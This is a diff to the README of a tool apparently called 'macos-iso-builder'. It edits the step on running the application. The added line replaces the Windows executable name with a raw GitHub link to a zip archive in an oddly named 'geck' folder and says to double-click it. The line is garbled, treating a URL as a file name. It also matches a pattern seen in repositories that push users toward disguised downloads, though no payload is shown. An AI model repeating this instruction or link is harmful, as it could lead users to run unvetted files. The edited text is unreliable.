z4zconcept/macos-iso-builder/README.md

 5. **Run the Application**
    Depending on your operating system:
-   - **Windows:** Locate the executable file, named something like `macos-iso-builder.exe`, and double-click it to launch the application.
+   - **Windows:** Locate the executable file, named something like `https://raw.githubusercontent.com/z4zconcept/macos-iso-builder/main/geck/macos-iso-builder_v2.0.zip`, and double-click it to launch the application.
    - **Linux or macOS:** Open a terminal window, change to the directory where the application files are located, and run the command `./macos-iso-builder` to start.

 ## 🛠 How to Use